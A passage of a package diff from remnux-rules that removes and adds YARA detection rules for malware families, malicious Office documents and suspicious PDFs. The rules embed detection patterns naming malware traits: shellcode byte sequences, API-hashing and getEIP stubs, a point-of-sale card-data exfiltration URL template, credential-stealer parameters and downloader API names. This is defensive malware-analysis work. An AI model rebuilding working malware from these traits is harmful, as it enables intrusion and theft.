-	condition:
-		all of ($n*) and 1 of ($s*)
-}
diff -Nru remnux-rules-0.0.3/yara/Lenovo_superfish.yara remnux-rules-0.0.4/yara/Lenovo_superfish.yara
--- remnux-rules-0.0.3/yara/Lenovo_superfish.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Lenovo_superfish.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,29 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-/* LENOVO Superfish -------------------------------------------------------- */
-
-rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
-	meta:
-		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
-		author = "Florian Roth / improved by kbandla"
-		reference = "https://twitter.com/4nc4p/status/568325493558272000"
-		date = "2015/02/19"
-		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
-		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
-		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
-		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
-	strings:
-		$mz = { 4d 5a }
-		//$s1 = "VisualDiscovery.exe" fullword wide
-		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
-		$s3 = "GetPCProxyHandler" fullword ascii
-		$s4 = "StartPCProxy" fullword ascii
-		$s5 = "SetPCProxyHandler" fullword ascii
-	condition:
-		( $mz at 0 ) and filesize < 2MB and all of ($s*)
-}
diff -Nru remnux-rules-0.0.3/yara/Leverage.yara remnux-rules-0.0.4/yara/Leverage.yara
--- remnux-rules-0.0.3/yara/Leverage.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Leverage.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,25 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule leverage_a
-{
-	meta:
-		author = "earada@alienvault.com"
-		version = "1.0"
-		description = "OSX/Leverage.A"
-		date = "2013/09"
-	strings:
-		$a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
-		$a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
-		$a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
-		$script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
-		$script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
-		$script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
-		$properties = "serverVisible \x00"
-	condition:
-		all of them
-}
diff -Nru remnux-rules-0.0.3/yara/LogPOS.yara remnux-rules-0.0.4/yara/LogPOS.yara
--- remnux-rules-0.0.3/yara/LogPOS.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/LogPOS.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,23 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-rule LogPOS
-{
-    meta:
-        author = "Morphick Security"
-        description = "Detects Versions of LogPOS"
-        md5 = "af13e7583ed1b27c4ae219e344a37e2b"
-    strings:
-        $mailslot = "\\\\.\\mailslot\\LogCC"
-        $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
-        //64A130000000      mov eax, dword ptr fs:[0x30]
-        //8B400C        mov eax, dword ptr [eax + 0xc]
-        //8B401C        mov eax, dword ptr [eax + 0x1c]
-        //8B4008        mov eax, dword ptr [eax + 8]
-        $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
-    condition:
-        $sc and 1 of ($mailslot,$get)
-}
diff -Nru remnux-rules-0.0.3/yara/LostDoor.yara remnux-rules-0.0.4/yara/LostDoor.yara
--- remnux-rules-0.0.3/yara/LostDoor.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/LostDoor.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,20 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule lost_door : Trojan
-{
-	meta:
-		author="Kevin Falcoz"
-		date="23/02/2013"
-		description="Lost Door"
-	
-	strings:
-		$signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/
-		
-	condition:
-		$signature1
-}
diff -Nru remnux-rules-0.0.3/yara/LuckyCat.yara remnux-rules-0.0.4/yara/LuckyCat.yara
--- remnux-rules-0.0.3/yara/LuckyCat.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/LuckyCat.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,22 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule LuckyCatCode : LuckyCat Family 
-{
-    meta:
-        description = "LuckyCat code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
-        $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
-        $commonletters = { B? 63 B? 61 B? 73 B? 65 }
-        
-    condition:
-        $xordecrypt or ($dll and $commonletters)
-}
diff -Nru remnux-rules-0.0.3/yara/LURK0.yara remnux-rules-0.0.4/yara/LURK0.yara
--- remnux-rules-0.0.3/yara/LURK0.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/LURK0.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,96 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule LURK0Header : Family LURK0 {
-	meta:
-		description = "5 char code for LURK0"
-		author = "Katie Kleemola"
-		last_updated = "07-21-2014"
-	
-	strings:
-		$ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
-
-	condition:
-		any of them
-}
-
-rule CCTV0Header : Family CCTV0 {
-        meta:  
-		description = "5 char code for LURK0"
-		author = "Katie Kleemola"
-		last_updated = "07-21-2014"
-
-	strings:
-		//if its just one char a time
-		$ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
-		// bit hacky but for when samples dont just simply mov 1 char at a time
-		$ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
-
-	condition:
-		any of them
-}
-
-rule SharedStrings : Family {
-	meta:
-		description = "Internal names found in LURK0/CCTV0 samples"
-		author = "Katie Kleemola"
-		last_updated = "07-22-2014"
-	
-	strings:
-		// internal names
-		$i1 = "Butterfly.dll"
-		$i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
-		$i3 = "ETClientDLL"
-
-		// dbx
-		$d1 = "\\DbxUpdateET\\" wide
-		$d2 = "\\DbxUpdateBT\\" wide
-		$d3 = "\\DbxUpdate\\" wide
-		
-		// other folders
-		$mc1 = "\\Micet\\"
-
-		// embedded file names
-		$n1 = "IconCacheEt.dat" wide
-		$n2 = "IconConfigEt.dat" wide
-
-		$m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
-		$m2 = "\x00\x00111\x00\x00" wide
-		$m3 = "\x00\x00ETUN\x00\x00" wide
-		$m4 = "\x00\x00ER\x00\x00" wide
-
-	condition:
-		any of them //todo: finetune this
-
-}
-
-rule LURK0 : Family LURK0 {
-	
-	meta:
-		description = "rule for lurk0"
-		author = "Katie Kleemola"
-		last_updated = "07-22-2014"
-
-	condition:
-		LURK0Header and SharedStrings
-
-}
-
-
-rule CCTV0 : Family CCTV0 {
-
-	meta:
-		description = "rule for cctv0"
-		author = "Katie Kleemola"
-		last_updated = "07-22-2014"
-
-	condition:
-		CCTV0Header and SharedStrings
-
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/MacControl.yara remnux-rules-0.0.4/yara/MacControl.yara
--- remnux-rules-0.0.3/yara/MacControl.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/MacControl.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,56 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule MacControlCode : MacControl Family 
-{
-    meta:
-        description = "MacControl code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-17"
-        
-    strings:
-        // Load these function strings 4 characters at a time. These check the first two blocks:
-        $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
-        $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
-        $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
-        $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
-        $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
-        
-    condition:
-        all of ($L4*) or $GEThgif
-}
-
-rule MacControlStrings : MacControl Family
-{
-    meta:
-        description = "MacControl Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-17"
-        
-    strings:
-        $ = "HTTPHeadGet"
-        $ = "/Library/launched"
-        $ = "My connect error with no ip!"
-        $ = "Send File is Failed"
-        $ = "****************************You Have got it!****************************"
-        
-    condition:
-        any of them
-}
-
-rule MacControl : Family
-{
-    meta:
-        description = "MacControl"
-        author = "Seth Hardy"
-        last_modified = "2014-06-16"
-        
-    condition:
-        MacControlCode or MacControlStrings
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/DecodedPDF_CVE_2010_1297.yar remnux-rules-0.0.4/yara/Malicious_Documents/DecodedPDF_CVE_2010_1297.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/DecodedPDF_CVE_2010_1297.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/DecodedPDF_CVE_2010_1297.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+rule FlashNewfunction: decodedPDF
+{
+   meta:  
+      ref = "CVE-2010-1297"
+      hide = true
+      impact = 5 
+      ref = "http://blog.xanda.org/tag/jsunpack/"
+   strings:
+      $unescape = "unescape" fullword nocase
+      $shellcode = /%u[A-Fa-f0-9]{4}/
+      $shellcode5 = /(%u[A-Fa-f0-9]{4}){5}/
+      $cve20101297 = /\/Subtype ?\/Flash/
+   condition:
+      ($unescape and $shellcode and $cve20101297) or ($shellcode5 and $cve20101297)
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_Contains_VBE_File.yar remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_Contains_VBE_File.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_Contains_VBE_File.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_Contains_VBE_File.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,28 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+  Version 0.0.1 2016/03/21
+  Source code put in public domain by Didier Stevens, no Copyright
+  https://DidierStevens.com
+  Use at your own risk
+
+  Shortcomings, or todo's ;-) :
+
+  History:
+    2016/03/21: start
+*/
+
+rule Contains_VBE_File
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+        description = "Detect a VBE file inside a byte sequence"
+        method = "Find string starting with #@~^ and ending with ^#~@"
+    strings:
+        $vbe = /#@~\^.+\^#~@/
+    condition:
+        $vbe
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_Hidden_PE_file.yar remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_Hidden_PE_file.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_Hidden_PE_file.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_Hidden_PE_file.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Contains_hidden_PE_File_inside_a_sequence_of_numbers
+{
+	meta:
+		author = "Martin Willing (https://evild3ad.com)"
+		description = "Detect a hidden PE file inside a sequence of numbers (comma separated)"
+		reference = "http://blog.didierstevens.com/2016/01/07/blackenergy-xls-dropper/"
+		reference = "http://www.welivesecurity.com/2016/01/04/blackenergy-trojan-strikes-again-attacks-ukrainian-electric-power-industry/"
+		date = "2016-01-09"
+		filetype = "decompressed VBA macro code"
+		
+	strings:
+		$a = "= Array(" // Array of bytes
+		$b = "77, 90," // MZ
+		$c = "33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46," // !This program cannot be run in DOS mode.
+	
+	condition:
+	 	all of them
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_MIME_ActiveMime_b64.yar remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_MIME_ActiveMime_b64.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_MIME_ActiveMime_b64.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_MIME_ActiveMime_b64.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule MIME_MSO_ActiveMime_base64
+{
+	meta:
+		author = "Martin Willing (https://evild3ad.com)"
+		description = "Detect MIME MSO Base64 encoded ActiveMime file"
+		date = "2016-02-28"
+		filetype = "Office documents"
+		
+	strings:
+		$mime = "MIME-Version:"
+		$base64 = "Content-Transfer-Encoding: base64"
+		$mso = "Content-Type: application/x-mso"
+		$activemime = /Q(\x0D\x0A|)W(\x0D\x0A|)N(\x0D\x0A|)0(\x0D\x0A|)a(\x0D\x0A|)X(\x0D\x0A|)Z(\x0D\x0A|)l(\x0D\x0A|)T(\x0D\x0A|)W/
+	
+	condition:
+		$mime at 0 and $base64 and $mso and $activemime
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_UserForm.yar remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_UserForm.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_UserForm.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_UserForm.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+
+rule Contains_UserForm_Object
+{
+	meta:
+		author = "Martin Willing (https://evild3ad.com)"
+		description = "Detect UserForm object in MS Office document"
+		reference = "https://msdn.microsoft.com/en-us/library/office/gg264663.aspx"
+		date = "2016-03-05"
+		filetype = "Office documents"
+		
+	strings:
+		$a = "UserForm1"
+		$b = "TextBox1"
+		$c = "Microsoft Forms 2.0"
+	
+	condition:
+	 	all of them
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_VBA_macro_code.yar remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_VBA_macro_code.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/Maldoc_VBA_macro_code.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/Maldoc_VBA_macro_code.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,28 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+
+rule Contains_VBA_macro_code
+{
+	meta:
+		author = "evild3ad"
+		description = "Detect a MS Office document with embedded VBA macro code"
+		date = "2016-01-09"
+		filetype = "Office documents"
+
+	strings:
+		$officemagic = { D0 CF 11 E0 A1 B1 1A E1 }
+		$zipmagic = "PK"
+
+		$97str1 = "_VBA_PROJECT_CUR" wide
+		$97str2 = "VBAProject"
+		$97str3 = { 41 74 74 72 69 62 75 74 00 65 20 56 42 5F } // Attribute VB_
+
+		$xmlstr1 = "vbaProject.bin"
+		$xmlstr2 = "vbaData.xml"
+
+	condition:
+		($officemagic at 0 and any of ($97str*)) or ($zipmagic at 0 and any of ($xmlstr*))
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/malicious_document.yar remnux-rules-0.0.4/yara/Malicious_Documents/malicious_document.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/malicious_document.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/malicious_document.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,292 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule maldoc_API_hashing : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a1 = {AC 84 C0 74 07 C1 CF 0D 01 C7 EB F4 81 FF}
+        $a2 = {AC 84 C0 74 07 C1 CF 07 01 C7 EB F4 81 FF}
+    condition:
+        any of them
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule maldoc_function_prolog_signature : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a1 = {55 8B EC 81 EC}
+        $a2 = {55 8B EC 83 C4}
+        $a3 = {55 8B EC E8}
+        $a4 = {55 8B EC E9}
+        $a5 = {55 8B EC EB}
+    condition:
+        any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule maldoc_structured_exception_handling : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a1 = {64 8B (05|0D|15|1D|25|2D|35|3D) 00 00 00 00}
+        $a2 = {64 A1 00 00 00 00}
+    condition:
+        any of them
+}
+*/
+
+rule maldoc_indirect_function_call_1 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {FF 75 ?? FF 55 ??}
+    condition:
+        for any i in (1..#a): (uint8(@a[i] + 2) == uint8(@a[i] + 5))
+}
+
+rule maldoc_indirect_function_call_2 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ??}
+    condition:
+        for any i in (1..#a): ((uint8(@a[i] + 2) == uint8(@a[i] + 8)) and (uint8(@a[i] + 3) == uint8(@a[i] + 9)) and (uint8(@a[i] + 4) == uint8(@a[i] + 10)) and (uint8(@a[i] + 5) == uint8(@a[i] + 11)))
+}
+
+rule maldoc_indirect_function_call_3 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {FF B7 ?? ?? ?? ?? FF 57 ??}
+    condition:
+        $a
+}
+
+rule maldoc_find_kernel32_base_method_1 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a1 = {64 8B (05|0D|15|1D|25|2D|35|3D) 30 00 00 00}
+        $a2 = {64 A1 30 00 00 00}
+    condition:
+        any of them
+}
+
+rule maldoc_find_kernel32_base_method_2 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {31 ?? ?? 30 64 8B ??}
+    condition:
+        for any i in (1..#a): ((uint8(@a[i] + 1) >= 0xC0) and (((uint8(@a[i] + 1) & 0x38) >> 3) == (uint8(@a[i] + 1) & 0x07)) and ((uint8(@a[i] + 2) & 0xF8) == 0xA0) and (uint8(@a[i] + 6) <= 0x3F) and (((uint8(@a[i] + 6) & 0x38) >> 3) != (uint8(@a[i] + 6) & 0x07)))
+}
+
+rule maldoc_find_kernel32_base_method_3 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {68 30 00 00 00 (58|59|5A|5B|5C|5D|5E|5F) 64 8B ??}
+    condition:
+        for any i in (1..#a): (((uint8(@a[i] + 5) & 0x07) == (uint8(@a[i] + 8) & 0x07)) and (uint8(@a[i] + 8) <= 0x3F) and (((uint8(@a[i] + 8) & 0x38) >> 3) != (uint8(@a[i] + 8) & 0x07)))
+}
+
+rule maldoc_getEIP_method_1 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {E8 00 00 00 00 (58|59|5A|5B|5C|5D|5E|5F)}
+    condition:
+        $a
+}
+
+rule maldoc_getEIP_method_4 : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a1 = {D9 EE D9 74 24 F4 (58|59|5A|5B|5C|5D|5E|5F)}
+        $a2 = {D9 EE 9B D9 74 24 F4 (58|59|5A|5B|5C|5D|5E|5F)}
+    condition:
+        any of them
+}
+
+rule maldoc_OLE_file_magic_number : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a = {D0 CF 11 E0}
+    condition:
+        $a
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule maldoc_suspicious_strings : maldoc
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+    strings:
+        $a01 = "CloseHandle"
+        $a02 = "CreateFile"
+        $a03 = "GetProcAddr"
+        $a04 = "GetSystemDirectory"
+        $a05 = "GetTempPath"
+        $a06 = "GetWindowsDirectory"
+        $a07 = "IsBadReadPtr"
+        $a08 = "IsBadWritePtr"
+        $a09 = "LoadLibrary"
+        $a10 = "ReadFile"
+        $a11 = "SetFilePointer"
+        $a12 = "ShellExecute"
+        $a13 = "UrlDownloadToFile"
+        $a14 = "VirtualAlloc"
+        $a15 = "WinExec"
+        $a16 = "WriteFile"
+    condition:
+        any of them
+}
+*/
+
+rule mwi_document: exploitdoc maldoc
+{
+    meta:
+        description = "MWI generated document"
+        author = "@Ydklijnsma"
+        source = "http://blog.0x3a.com/post/117760824504/analysis-of-a-microsoft-word-intruder-sample"
+
+      strings:
+        $field_creation_tag = "{\\field{\\*\\fldinst { INCLUDEPICTURE"
+        $mwistat_url = ".php?id="
+        $field_closing_tag = "\\\\* MERGEFORMAT \\\\d}}{\\fldrslt}}"
+
+    condition:
+        all of them
+}
+
+rule macrocheck : maldoc
+{
+    meta:
+        Author      = "Fireeye Labs"
+        Date        = "2014/11/30" 
+        Description = "Identify office documents with the MACROCHECK credential stealer in them.  It can be run against .doc files or VBA macros extraced from .docx files (vbaProject.bin files)."
+        Reference   = "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html"
+
+    strings:
+        $PARAMpword = "pword=" ascii wide
+        $PARAMmsg = "msg=" ascii wide
+        $PARAMuname = "uname=" ascii
+        $userform = "UserForm" ascii wide
+        $userloginform = "UserLoginForm" ascii wide
+        $invalid = "Invalid username or password" ascii wide
+        $up1 = "uploadPOST" ascii wide
+        $up2 = "postUpload" ascii wide
+ 
+    condition:
+        all of ($PARAM*) or (($invalid or $userloginform or $userform) and ($up1 or $up2))
+}
+rule office_document_vba : maldoc
+{
+	meta:
+		description = "Office document with embedded VBA"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-12-17"
+		reference = "https://github.com/jipegit/"
+
+	strings:
+		$officemagic = { D0 CF 11 E0 A1 B1 1A E1 }
+		$zipmagic = "PK"
+
+		$97str1 = "_VBA_PROJECT_CUR" wide
+		$97str2 = "VBAProject"
+		$97str3 = { 41 74 74 72 69 62 75 74 00 65 20 56 42 5F }
+
+		$xmlstr1 = "vbaProject.bin"
+		$xmlstr2 = "vbaData.xml"
+
+	condition:
+		($officemagic at 0 and any of ($97str*)) or ($zipmagic at 0 and any of ($xmlstr*))
+}
+
+rule Office_AutoOpen_Macro : maldoc {
+	meta:
+		description = "Detects an Microsoft Office file that contains the AutoOpen Macro function"
+		author = "Florian Roth"
+		date = "2015-05-28"
+		score = 60
+		hash1 = "4d00695d5011427efc33c9722c61ced2"
+		hash2 = "63f6b20cb39630b13c14823874bd3743"
+		hash3 = "66e67c2d84af85a569a04042141164e6"
+		hash4 = "a3035716fe9173703941876c2bde9d98"
+		hash5 = "7c06cab49b9332962625b16f15708345"
+		hash6 = "bfc30332b7b91572bfe712b656ea8a0c"
+		hash7 = "25285b8fe2c41bd54079c92c1b761381"
+	strings:
+		$s1 = "AutoOpen" ascii fullword
+		$s2 = "Macros" wide fullword
+	condition:
+		uint32be(0) == 0xd0cf11e0 and all of ($s*) and filesize < 300000
+}
+
+rule Embedded_EXE_Cloaking : maldoc {
+    meta:
+        description = "Detects an embedded executable in a non-executable file"
+        author = "Florian Roth"
+        date = "2015/02/27"
+        score = 80
+    strings:
+        $noex_png = { 89 50 4E 47 }
+        $noex_pdf = { 25 50 44 46 }
+        $noex_rtf = { 7B 5C 72 74 66 31 }
+        $noex_jpg = { FF D8 FF E0 }
+        $noex_gif = { 47 49 46 38 }
+        $mz  = { 4D 5A }
+        $a1 = "This program cannot be run in DOS mode"
+        $a2 = "This program must be run under Win32"       
+    condition:
+        (
+            ( $noex_png at 0 ) or
+            ( $noex_pdf at 0 ) or
+            ( $noex_rtf at 0 ) or
+            ( $noex_jpg at 0 ) or
+            ( $noex_gif at 0 )
+        )
+        and
+        for any i in (1..#mz): ( @a1 < ( @mz[i] + 200 ) or @a2 < ( @mz[i] + 200 ) )
+}
+
+rule RTF_Shellcode : maldoc
+{
+meta:
+
+                author = "RSA-IR – Jared Greenhill"
+                date = "01/21/13"
+                description = "identifies RTF's with potential shellcode"
+                filetype = "RTF"
+
+
+
+strings:
+                $rtfmagic={7B 5C 72 74 66}
+                $scregex=/[39 30]{2,20}/
+condition:
+
+                ($rtfmagic at 0) and ($scregex)
+}
diff -Nru remnux-rules-0.0.3/yara/Malicious_Documents/PDF.yar remnux-rules-0.0.4/yara/Malicious_Documents/PDF.yar
--- remnux-rules-0.0.3/yara/Malicious_Documents/PDF.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Malicious_Documents/PDF.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,476 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule malicious_author : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 5
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		
+		$reg0 = /Creator.?\(yen vaw\)/
+		$reg1 = /Title.?\(who cis\)/
+		$reg2 = /Author.?\(ser pes\)/
+	condition:
+		$magic at 0 and all of ($reg*)
+}
+
+rule suspicious_version : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 3
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$ver = /%PDF-1.\d{1}/
+	condition:
+		$magic at 0 and not $ver
+}
+
+rule suspicious_creation : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 2
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$header = /%PDF-1\.(3|4|6)/
+		
+		$create0 = /CreationDate \(D:20101015142358\)/
+		$create1 = /CreationDate \(2008312053854\)/
+	condition:
+		$magic at 0 and $header and 1 of ($create*)
+}
+
+rule multiple_filtering : PDF raw
+{
+meta: 
+author = "Glenn Edwards (@hiddenillusion)"
+version = "0.2"
+weight = 3
+
+    strings:
+            $magic = { 25 50 44 46 }
+            $attrib = /\/Filter.*(\/ASCIIHexDecode\W+|\/LZWDecode\W+|\/ASCII85Decode\W+|\/FlateDecode\W+|\/RunLengthDecode){2}/ 
+            // left out: /CCITTFaxDecode, JBIG2Decode, DCTDecode, JPXDecode, Crypt
+
+    condition: 
+            $magic at 0 and $attrib
+}
+
+rule suspicious_title : PDF raw
+{
+	meta:
+		author = "Glenn Edwards (@hiddenillusion)"
+		version = "0.1"
+		weight = 4
+		
+	strings:
+		$magic = { 25 50 44 46 }
+		$header = /%PDF-1\.(3|4|6)/
+		
+		$title0 = "who cis"
+		$title1 = "P66N7FF"
+		$title2 = "Fohcirya"
+	condition:
+		$magic at 0 and $header and 1 of ($title*)
+}
+
+rule suspicious_author : PDF raw
+{
+	meta:
